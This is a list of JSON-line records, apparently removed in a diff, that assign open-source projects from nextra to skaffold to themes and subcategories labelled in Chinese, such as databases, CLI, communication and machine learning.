-{"slug":"nextra","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"nginx-rtmp-module","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"nginx","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"nivo","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"nix","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nnn","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"node-js","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"语言运行时","source":"candidates.topic","confidence":"high","rawCategory":"编译器"} -{"slug":"nodegui","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"nodemailer","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"nomad","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps / 编排","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"notepad-plus-plus","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nsq","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"numpy","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"nushell","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nuttx","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"nuxt","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Meta 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"nvchad","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nvidia-gpu-operator","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"nvidia-mig","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"infrastructure","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"nvm","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nx","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程化","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"obs-studio","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"observable-framework","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"observable-plot","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"category","confidence":"high","rawCategory":"数据可视化"} -{"slug":"oclif","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"ofetch","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程化","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"ogre","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"oh-my-posh","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"ollama","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"open-sora","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"openai-agents-sdk","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 工程","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"opencv","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"openlayers","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"openmeetings","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"openrct2","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"opensea-js","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"opensearch","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"opentelemetry-collector","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"opentelemetry","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"openthread","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"opentofu","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"opentsdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"openvidu","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"openwrt","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"openzeppelin-contracts","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"operator-sdk","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"optax","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"optimism","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"opus","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"ora","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"orleans","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"otel-collector","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施 / 可观测性","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"ovenmediaengine","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"oxc","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"projects / 编译器","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"paddleocr","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"panda3d","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"pandas","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"panel","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"partykit","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"patchright","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"pdfkit","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"pdfmake","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"pdfme","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"pebble","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"peerjs-server","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"penpot","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 设计工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"pg-boss-readme","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"pgvector","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库 / 向量","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"phaser","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"phoenix","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"pillow","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"pino","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / Node.js","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"pinot","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"pion","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"piper","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"pixi","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"projects / 图形渲染","source":"category","confidence":"high","rawCategory":"图形学"} -{"slug":"plane","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"SaaS 应用","source":"slugOverrides","confidence":"high","rawCategory":"后端 API"} -{"slug":"platformio-core","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"playcanvas","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"playwright","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"测试","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"plotly-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"plotly-py","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"plotnine","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"plug","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"pnpm","area":"projects","theme":"CLI","themeId":"cli","subcategory":"projects / 工具","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"pocketbase","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"podman","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"poem","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"polars","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"polygon-zkevm","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"postal","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"postfix","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"postgres-js","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"postgresql","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"pouchdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"preact","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"prefect","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"prisma","area":"projects","theme":"数据库","themeId":"databases","subcategory":"ORM","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"probe-rs","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"procs","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"prom-client","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"prometheus","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"promptfoo","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 工程基建","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"prosemirror","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"prosody","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"prysm","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"pulsar","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"pulumi","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"pyarrow","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"pyenv","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"pyth","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"pytorch-lightning","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"pytorch","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"qdrant","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"quarkus","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"quart","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"quasar","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"questdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"quickjs","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"语言运行时","source":"candidates.topic","confidence":"high","rawCategory":"编译器"} -{"slug":"qwik","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"rabbitmq-server","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"rabby-wallet","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"radix-ui","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端组件库","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"rails","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"ranger","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"rasa","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"ratatui","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"ravendb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ray","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"raylib","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"react-dnd","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"react-flow","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"react-hook-form","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"react-intl","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端 i18n","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"react-native","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"react-spring","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端动画","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"react","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"recharts","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"category","confidence":"high","rawCategory":"数据可视化"} -{"slug":"redash","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"redis","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"redpanda","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"regl","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"remix-ide","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"remix","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Meta 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"reservoir-sdk","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"rethinkdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ripgrep","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"risingwave","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"robyn","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"rocket-chat","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"rocket","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"rocksdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"rolldown","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"rollup","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"rook","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"rspack","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"rt-thread","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"runc","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"safe-contracts","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"salvo","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"sam2","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"sanic","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"scikit-learn","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"scipy","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"scoop","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"scrcpy","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"scroll","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"sd","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"seaborn","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"sealed-secrets","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"sentry","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"可观测性","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"sequelize","area":"projects","theme":"数据库","themeId":"databases","subcategory":"ORM","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"sglang","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"shadcn-ui","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端 / 组件库","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"shaka-packager","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"shaka-player","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"shap","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"sharedb","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"sharp","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"projects / 图像处理","source":"category","confidence":"high","rawCategory":"图形学"} -{"slug":"shell-gpt","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"shellcheck","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"shfmt","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"shiki","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"shotcut","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"sia","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"sidekiq","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"sigma-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"signal-android","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"signal-ios","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"signal-server","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"signoz","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"silero-vad","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"simple-peer","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"sinatra","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"skaffold","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} 